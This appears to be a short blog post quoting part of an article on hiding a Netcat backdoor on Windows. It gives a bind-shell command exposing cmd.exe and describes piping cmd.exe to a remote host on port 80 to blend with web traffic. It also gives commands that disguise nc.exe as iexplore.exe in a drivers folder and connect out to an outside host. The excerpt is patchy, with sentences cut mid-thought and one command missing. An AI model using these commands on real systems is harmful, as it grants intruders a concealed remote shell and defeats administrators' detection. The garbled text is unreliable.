I had this piece of information which I came across when professor was taking NetCat class. I don’t have the whole article. Here is a piece that explains how a hacker can run the backdoor and also hide it from a not so smart network or system admin. It is technical. If you are interested in these type of information, read on.
Netcat Backdoor Victim: nc -L -d -p <port> -t -e cmd.exe
with a lot of activity. Hackers might try a different approach. If they’ve infiltrated a Citrix server, for example, accessed by several users who are surfing the Web, you’d expect to see a lot of Domain Name System (DNS) lookups and Web connections. Running netstat –a –n would reveal a load of outgoing TCP port 80 connections. Instead of having an instance of Netcat listening on the Windows box and waiting for connections, Netcat can pipe the input and output of the cmd.exe program to another Netcat instance listening on a remote box on port 80. On his end, the hacker would run:
From the Windows box, the hacker could cleverly “hide” Netcat again and issue these commands:
move nc.exe C:\Windows\System32\Drivers\q\iexplore.exe
cd Windows\System32\Drivers\q
WINDOWS\System32\DRIVERS\q>iexplore.exe
Cmd line: -d -e cmd.exe originix 80
WINDOWS\System32\DRIVERS\q>